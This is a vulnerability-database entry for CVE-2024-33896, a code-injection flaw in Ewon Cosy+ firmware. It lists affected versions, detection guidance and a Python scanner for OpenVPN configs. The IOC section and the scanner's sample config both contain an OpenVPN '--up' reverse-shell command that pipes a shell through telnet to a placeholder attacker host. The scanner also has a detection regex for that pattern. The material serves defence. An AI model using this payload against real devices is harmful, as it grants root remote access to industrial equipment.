CVE-2024-33896
published 2024-08-02

CVE-2024-33896: Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are vulnerable to code injection due to improper parameter blacklisting…

Priority: P3 (54), high
CVSS 3.1 base score: 7.2
CVSS vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Tags: EXPLOIT
EPSS: 4.02% (89.3rd percentile)
Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are vulnerable to code injection due to improper parameter blacklisting. This is fixed in version 21.2s10 and 22.1s3.

Affected (2 ranges)

Vendor         Product                 Version range     Fixed in
hms-networks   ewon_cosy_+_firmware    21.0 – 21.2s10    21.2s10
hms-networks   ewon_cosy_+_firmware    22.0 – 22.1s3     22.1s3

Detection & IOCs (extracted from sources)

command:  --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0$TF"'
filename: malicious_config.ovpn
port:     5000
  • Detect upload of OpenVPN configuration files containing the '--up' or '--down' parameters to Ewon Cosy+ devices, as these are the injected parameters used to execute arbitrary OS commands.
  • Alert on outbound telnet connections (TCP port 23) or reverse shell patterns (mkfifo + telnet) originating from Ewon Cosy+ devices, indicative of successful exploitation.
  • Monitor for 'script-security 2' in uploaded OpenVPN config files on Cosy+ devices; this directive is required to enable execution of --up/--down scripts and is a strong indicator of malicious intent.
  • The exploit runs as root on the device; any unexpected root-level process spawned from the OpenVPN process tree on Cosy+ should be treated as a high-severity indicator of compromise.
  • Exploitation requires authentication; the attacker must have valid credentials to upload the malicious OpenVPN configuration file to the device.
  • Affected firmware versions are 21.x below 21.2s10 and 22.x below 22.1s3; devices on these versions should be prioritized for patching.
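The detection points above (--up/--down directives, script-security 2, and the mkfifo+telnet pattern) as a config-upload check, written here as an added example rather than code from the database or the vendor; it goes a little beyond the page by also flagging OpenVPN's other script-hook directives, and the sample configs and the 192.0.2.10 address are constructed.

```python
"""Flag uploaded OpenVPN configs that carry script-execution directives."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# 'up' and 'down' are the hooks named in the CVE-2024-33896 IOCs; the rest
# are OpenVPN's other directives that execute an external program, included
# so the check is not bypassed by a sibling hook.
SCRIPT_HOOKS = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify",
}
# Reverse-shell body pattern from the IOC: a fifo wired into telnet.
REVERSE_SHELL_RE = re.compile(r"mkfifo\b.*\btelnet\b", re.S)

@dataclass
class Finding:
    line_no: int      # 0 = whole-file pattern match
    directive: str
    reason: str

def _parse(line: str) -> Optional[Tuple[str, List[str]]]:
    """Split a config line into (directive, args); None for blank/comment lines.
    OpenVPN accepts an optional leading '--' in config files, so strip it."""
    stripped = line.strip()
    if not stripped or stripped[0] in "#;":
        return None
    token, *args = stripped.split()
    return (token[2:] if token.startswith("--") else token), args

def scan_openvpn_config(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        parsed = _parse(line)
        if parsed is None:
            continue
        directive, args = parsed
        if directive in SCRIPT_HOOKS:
            findings.append(Finding(n, directive, "script hook runs an OS command on the device"))
        elif directive == "script-security" and args and args[0].isdigit() and int(args[0]) >= 2:
            findings.append(Finding(n, directive, f"level {args[0]} enables --up/--down scripts"))
    if REVERSE_SHELL_RE.search(text):
        findings.append(Finding(0, "body", "mkfifo+telnet reverse shell pattern"))
    return findings

# Constructed samples: a plain client config and one carrying the page's IOC line.
BENIGN_CONFIG = "client\ndev tun\nremote 192.0.2.10 1194\n# up is not used here\n"
SUSPICIOUS_CONFIG = (
    "client\ndev tun\nremote 192.0.2.10 1194\nscript-security 2\n"
    "--up '/bin/sh -c \"TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0$TF\"'\n"
)
```

A benign config yields no findings; the suspicious one reports script-security at line 4, the up hook at line 5, and the reverse-shell body pattern.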